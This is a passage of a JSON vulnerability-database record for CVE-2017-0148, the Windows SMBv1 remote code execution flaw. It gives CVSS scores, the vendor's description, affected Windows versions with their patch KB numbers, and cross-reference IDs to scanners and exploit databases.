"AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-20T08:45:23", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-20T02:45:21", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-20T02:45:21", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KBMS16-110, 3187754", "KB3212646", "KB3210721", "KB4012598", "KB4013198", "KB4012215", "KB3205401", "KB4012606", "KB4012213", "KB3213986", "KB4012216", "KB4012217", "KB3210720", "KB4012212", "KB4012214", "KB3205409", "KB3177186"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T08:45:23", "differentElements": ["msAffectedSoftware"], "edition": 70}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-20T10:55:46", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-20T02:45:21", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-20T02:45:21", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012598", "KB3213986", "KB3210721", "KB3177186", "KB4012606", "KB4012217", "KB3212646", "KB4012212", "KB4012214", "KB3205401", "KB4013429", "KB4012215", "KB3205409", "KB4012213", "KBMS16-110, 3187754", "KB4012216", "KB4013198", "KB3210720"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T10:55:46", "differentElements": ["msAffectedSoftware"], "edition": 71}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "80a0fac71f040ba4d47cf15ded29e9dd", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": 